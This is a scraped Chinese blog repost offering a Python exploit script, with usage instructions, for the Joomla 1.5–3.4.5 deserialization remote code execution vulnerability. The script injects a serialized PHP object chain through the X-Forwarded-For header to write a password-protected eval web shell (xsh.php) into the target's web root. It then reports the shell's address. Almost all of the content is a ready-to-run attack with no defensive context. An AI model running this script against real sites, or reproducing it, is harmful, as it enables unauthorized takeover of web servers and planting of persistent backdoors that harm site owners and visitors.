zoukankan      html  css  js  c++  java
  • Joomla![1.5-3.4.5]反序列化远程代码执行EXP(直接写shell)

    Usage:x.py http://xxx.com

    # coding=utf-8
    # author:KuuKi
    # Help: joomla 1.5-3.4.5 unserialize remote code execution

    import urllib2
    import cookielib,sys
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)
    urllib2.socket.setdefaulttimeout(10)

    payload = 'file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."xsh.php","x3C".chr(63)."@eval(x5Cx24_POST[x]);")'

    forward = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"x5C0x5C0x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:' + str(len(payload)+28) + ':"' + payload + ';JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"x5C0x5C0x5C0connection";b:1;}xF0x9Dx8Cx86'
    req = urllib2.Request(url=sys.argv[1],headers={'x-forwarded-for':forward})
    opener.open(req)
    req = urllib2.Request(url=sys.argv[1])
    if 'SimplePie_Misc::parse_url' in opener.open(req).read():
        print 'Shell: '+ sys.argv[1] + '/xsh.php Password: x'
    else:
        print 'Unvunerable!'

  • 相关阅读:
    页面get请求 中文参数方法乱码问题
    java版ftp简易客户端(可以获取文件的名称及文件大小)
    文件下载
    kafka:一个分布式消息系统
    Executor的线程代码
    验证码的生成
    二维码的简单实现
    rsync实现大致流程描述
    C++中模板生成时机
    gcc虚函数表生成时机
  • 原文地址:https://www.cnblogs.com/milantgh/p/5193723.html
Copyright © 2011-2022 走看看